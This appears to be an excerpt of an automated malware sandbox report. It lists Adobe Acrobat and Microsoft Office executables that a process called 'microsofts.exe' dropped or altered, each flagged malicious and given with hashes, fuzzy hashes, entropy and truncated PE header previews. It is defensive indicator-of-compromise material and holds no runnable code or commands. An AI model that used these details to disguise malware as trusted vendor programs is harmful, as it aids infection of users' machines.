                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:18B23EF547A003006DF461A55F74EB6CB54908DB
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:1FBB4EDECF68B2FF3FF9A99D1E34601D0E322358099BD7FBF200CF9D813EE982
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:25EB554C8A9780C5E11BAE04CB970EBB4F2833D2DCEE241DCFC9E342D0F87A12AAE9CE1DC247E46EC7D2D59970D16A4DEFCA52888A58BE18D1D15E14B7E76C1C
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0I..Q'..Q'..Q'..7#..Q'..7$..Q'..7".!Q'..$#..Q'..$$..Q'..7&..Q'..$"..Q'.x$"..Q'..Q&.dQ'.x$...Q'.x$...Q'..Q...Q'.x$%..Q'.Rich.Q'.........................PE..d.....Zd.........."......,..........(?.........@.....................................b.... .................................................(...P................m..................tC..p...........................p...8............@..........@....................text....+.......,.................. ..`.rdata......@.......0..............@..@.data....)..........................@....pdata...m.......n..................@..@_RDATA...............B..............@..@.rsrc................D..............@..@.reloc...`...@...P..................@...................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1338368
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.3526507327361506
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:5fY+FUBoXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:5A+qBosqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:957CE736BE03014E05BF4172AE2748A1
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:CC2EC588C64AA875F492F1841F694B080C09F4C6
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4DF9DDD0BECA46C48A01DA67BAF7C45E54CA7463D810012E528D4E004DCB0A9D
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:153809C63C49B5500C2CE5A5B0A70BF5404CC04BCFE9AF23F70AB66BB06AB0B355AFEC6EDCB486DFC63554932CD2399705AB720F290EA279E83DCD04B8868F2B
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..*...y...y...y...y...y..x...y..x...y..x...y..x-..y..Ey...yb.x...y...y..yN.x...yN.}y...yN.x...yRich...y........PE..L...<..[................. ...................0....@..................................$..............................................0...............................J..p....................K.......J..@............0...............................text... ........ .................. ..`.rdata.......0.......$..............@..@.data....E.......B..................@....rsrc........0......................@..@.reloc...p...@...`..................@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1143296
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.022678247300027
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:+Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:+sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:70513EC31B42A1D10E4F7C4FF6D753A7
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:346C42CDAF11D74EA4CD9B3641DD0F38D5C61390
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:058B7BF8C9D71CB2F4BF0F3D1FFA60F66A9793EED1B2285536633122A976FD1E
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:535D280EEDC9E3402011AC38C106DF10FA46BF4FDE38D17F69A7656D392AFAFC89F92F8CA436F3AEEA88356902535A78EA9953099840C9ACAA400ABC84E22C44
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................+.............................................................G.............Rich............................PE..d...~^.c.........."..........$......p..........@....................................w .... ..................................................;.......p.......`......................d4..p............................4..8............0..0............................text...|........................... ..`.rdata.......0......................@..@.data........P.......,..............@....pdata.......`......................@..@.rsrc........p.......0..............@..@.reloc...P.......@...2..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1161728
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.047151054576868
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:okXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:psqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:218E297C0B9167531FDA0494169BD2D7
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:5510727E7CD6D45164472E011C54204E8A96BE14
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F8B769BED51313A9108DAE26ECF7AFAE67B590C4DCB4C5BC3FB43983E938853C
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:5CB268ED7E6DC74C266FC7EABA6E8AF00E4AB38D5332637D14E4FCD74BB4D991426F6268DB2E8C3DED59FA355996EBF28E8C4CAC1C89384DE5DB02DB8822C71B
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2\.v=..v=..v=...E?.x=..I..|=..I..u=..I..j=..I..p=..bV..q=..v=...=..I..t=..IS.w=..v=;.w=..I..w=..Richv=..........................PE..d....^.c.........."......<...B.......>.........@.......................................... ..................................................i..........P.......,...................`X..T............................X..8............P...............................text....;.......<.................. ..`.rdata..$'...P...(...@..............@..@.data................h..............@....pdata..,............l..............@..@.rsrc...P............r..............@..@.reloc...P.......@...z..............@...........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):4151808
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.499777357959095
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:atuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN755JDmg27RN:ajEIa4HIEWOc5TD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:98C0971293E8E841115F5417E629C79F
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:30D7130EFBC27C25DD6A107ED64BAFA61733BC28
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:E23F0DCFD327DD6908100670A1A0FE0BC8B1066EDCCC175A86DC4A083A1B4ECF
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:A29927BB966D2713FAAF627248C692934DFC1F3ADD32CBBEF18B2CA2C87F2163D3940C7CA1A517E7EC0390C8267A241CFA140FEC3EB8244728EC8F32221F3D27
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @.....^.?... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):59941376
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.999367317590146
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1572864:qQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:hXhwMhe6AABPiQwF6xQ22R
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:65311AAE5F505ED11F08A270A2E57AE8
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:5950E17DF6A5B51F8D9D8E47E2B2004600EEF259
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:8A757A59A2BEAC7D82F0B3854D95C29E40E95AA33485FE0583FD3589B91DDE12
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:0DBD09BFD4907A851BB114ADFEFB6DDF3DDB04917E92F6918C126BCC908C105DA4B9587259DFE4552B40079CBA954B7303887FADCDAE98857399C4383E339C1E
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0........... .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1230336
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.185595689762236
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:lejVWYUAkXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:QjkY7ksqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:4177A2185647BDEC804E6A21FE58ACE1
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:106621D76B97A27CD1D9FEB9D9ED0BDF98C6ECB0
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:34DF89FA363D777FEA2355EB767686C9B263FB0BDB045AE193EF5673F888B3C9
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BC1D528E9A7C9EC57EE89325F6455DDC921DE1254AFAF6EA1F92E820F474A515749F7CE67DD0F9C719DE2751E06D846FBCB002284C9CAFB0304F63E23C8D9E6E
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................b....6......6......6.....6.....................M..4......4......4........f....4.....Rich...........................PE..L.....{d.................&...`...............@....@..........................................................................r..,................................... O..p....................P.......O..@............@..4............................text....%.......&.................. ..`.rdata...@...@...B...*..............@..@.data................l..............@....rsrc................p..............@..@.reloc...`.......P...v..............@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1384960
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.377812708800284
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:NxwSJhkrmZsQsqjnhMgeiCl7G0nehbGZpbD:Ny+krKsMDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:153105F1CC9F648CCF71BB895355661A
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:A2379A6DD7910C79870B6071203D5F74D31C5C4B
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:E3BAC8AAECAA94E819DBEFDEF3B89C0FBFE656DE6059183514508978F957AFB9
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:FE01A8A022B05423D2B36E6DCA48407B3D91737948902059ECE5B3B31B9707B115641BE80B3BD83D8B689D3E4EE96A5F9B92F266B0A2E88914B32D89B496810B
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................y...5.......5.....5......7.......................7.....7.Z....2...7.....Rich..........................PE..d.....{d.........."..........<.......&.........@.......................................... .................................................`...x.... ..............................`j..p....................l..(....j..8............................................text...l........................... ..`.rdata..............................@..@.data...4#..........................@....pdata........... ..................@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc...P...0...@..................@...................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1649152
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.632720792529404
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:eHQJLIRgvsnNJsqjnhMgeiCl7G0nehbGZpbD:eHQJL34NDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:20184CFA203DC6AA54CF0140D73EE864
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:67340FB962BD00C1F4512F0022660101995C1F44
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A3A02DDC1C50DC98D1FEB0D670EAA3938817AFD0C1E3F2775F3C8954A8B2F570
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:7720F89519A2E7BF638DBE83E60E3DD12F75833672084BA6C6EA7F58FA49215D9E2B0DB56C41704EE6A8EF95F6C1698AD233A1679310FBCC99D10F7FF8954D74
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L<."o."o."o...o.."o+.&n.."o+.!n.."o+.#n."o+.'n."o..$n."o..#n.."o).+n.."o.#o;."o).'n."o)..o."o). n."oRich."o........PE..d......d.........."......\.....................@....................................f<.... .................................................."..@....0...........W..................x...T.......................(...`...8............p..........`....................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data....^...P...R...2..............@....pdata...W.......X..................@..@.didat..8...........................@....msvcjmc..... ......................@....rsrc........0......................@..@.reloc...P...@...@..................@...................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):5365760
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.450963168648752
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:nUZujDjDjDjXmXgoz2PsapFQrC7dRpqbeE8U2IzwDt+bdro4O8b8ITDnlggyJ1kY:UWmXL6DEC7dRpKuDQbgWD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:7D5AB639B46CCD5B9E040E2AABF23F82
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:5C5CCA6B3D02597CA84732AA1C63F691300181D4
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:689922877BCB34F7F83C1CC9EE2C91BDD837AF0238DAF3BEED7F5E04A5C4120E
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:9E7F4594BCF78D4001F2AF6EADC771D4554470D3ADE32B0540FAAE6B0FD3E2676298D550041330091904A5D1EB50324448FBB924CD80C5D4B57A50198E65745D
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........I.~.(g-.(g-.(g-.Cd,.(g-.Cb,i(g-.G.-.(g-b\c,.(g-b\d,.(g-.t.-.(g-.(g-C(g-b\b,.(g-.Cc,.(g-.Ca,.(g-.Cf,.(g-.(f-.+g-`\b,.(g-`\g,.(g-`\.-.(g-.(.-.(g-`\e,.(g-Rich.(g-........PE..L......d.........."......./..p......P"%.......0...@...........................R.......Q..............................@:......@:.......;..V...........................^6.T...................._6.....h.5.@.............0...... :.`....................text...*./......./................. ..`.rdata..Ze....0..f....0.............@..@.data....E....:......h:.............@....didat........;......B;.............@....rsrc....V....;..X...H;.............@..@.reloc...P...@G..@....F.............@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):3163136
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.972781460762583
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:98304:orZ23AbsK6Ro022JjL2WEiVqJZpD527BWG:CJADmmxL2WEoCZpVQBWG
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:699F9CEEB82321DABE2146018B22F487
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D257010C5C19955B0B1AFF4E09A2C929B6846AFC
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0148E4F4FAF10951841DF56A1896794FB1FDCD6DFFAB5CF5657096C3ACE73036
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:93868754EA08CDD2A8D147BD6D3A1E6C7A3D7E460D99F9481BAEBC1D7BAF8A92D158A5C379B58B2B1E8EC5F32AACA0E5967CD84DD7E4B9F28E17D5536AE828A6
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5{.!q..rq..rq..rq..r...rQc.r`..rQc.r`..rQc.rp..rQc.rp..rRichq..r........................PE..L.....A.................~... .......^... ........... ........................1......21.......... .....................................0............................!............................................... ...............................text....|... ...~.................. ..`.data...............................@....rsrc...../......./.................@...................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1213440
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.204906337872632
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:ofrYY42wd7hlOw9fpkEE64AsqjnhMgeiCl7G0nehbGZpbD:lz9xrS8Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:3362AFD5CF849427D2BC0955FF367C35
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D27075CA31EEAD97EC315FB8AFA06621ABBBED88
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:802D0FCB5E78E4CCBD1A5A803361ECCC6AC8855FFC2027D9507766481FBFA544
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:0D300766FCADAD875A3DEA37BB4D29EE61FAB72E8C41D5F0283493F7998A7C4241EC8C61CC06A75095965FA30808E01D04D34B1090E35C89D8C5FD2C7D11A3F8
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@......T...T...T...U...T...U...T..U...T..U...T...U...T..U...T...U...T...Tf..T..U...T..T...T..uT...T..U...TRich...T................PE..d.....{d..........#......J...........3.........@............................. ........... ..................................................L.......`..........(J..................p...T.......................(... B..8............`.......I..`....................text....H.......J.................. ..`.rdata..d....`.......N..............@..@.data...(w...p...&...^..............@....pdata..(J.......L..................@..@.didat.......@......................@..._RDATA.......P......................@..@.rsrc........`......................@...................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1388544
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.2729399535312
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:nwkNKiZ+R2GGNUbTF5vXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/T:nzNKUE5vsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:0679F7DD20FB5D718C60587AA50F928D
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D0BDADEDE7B4B9D0DE3339A0AF07C83794458E2D
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A67B5DE119892A6F1D8F8AF3824AFBA64B8B196974DE8C9F07D0786ADCB61AD8
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:3AA70BD7FC280057C51FD12ACD3A3C9861CE53F9CDD3C7177DC06CD93B1C224CC5509A40A58224DE6880E1A6DF990416F9077A901DB4B41FB530CFF331611561
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........E@..$...$...$...\...$...V*..$...V-..$...V+..$...V/..$...$/.0 ...V&..$...V..$...V..$...V,..$..Rich.$..........PE..d...!!.R.........."......`..........0C.........@.............................P............ .......... ......................................Xl..........X.......d.......................T...................8...(.......8...........`...`............................text...(X.......`.................. ..`.rdata..z....p... ...p..............@..@.data...............................@....pdata..d........ ..................@..@.rsrc...X...........................@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):5855744
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.5743300973711785
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:98304:KALuzDKnxCp3JKNrPJzruaI6HMaJTtGbCD527BWG:9aGg3cFPIaI6HMaJTtGbCVQBWG
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E82F15488BCFDEC21C8E27E522CD72DA
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:0D0F8580EEA4CD0F19BE2CB35854162A154DD04E
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:DB54BD5B8CDAC1BED5D3F63F6E43AC1FFF4CD394684888126C4E1A21C491D09E
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:E0DD8FA96619AF6DA6B087D9D5D0FD966EDC7E1DB14D38EF808C2EFD44396932E8F2DB3946490587489CC3D2ACCEE7310D8E7D85CBDAF4EFC40625BEE53E90E2
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
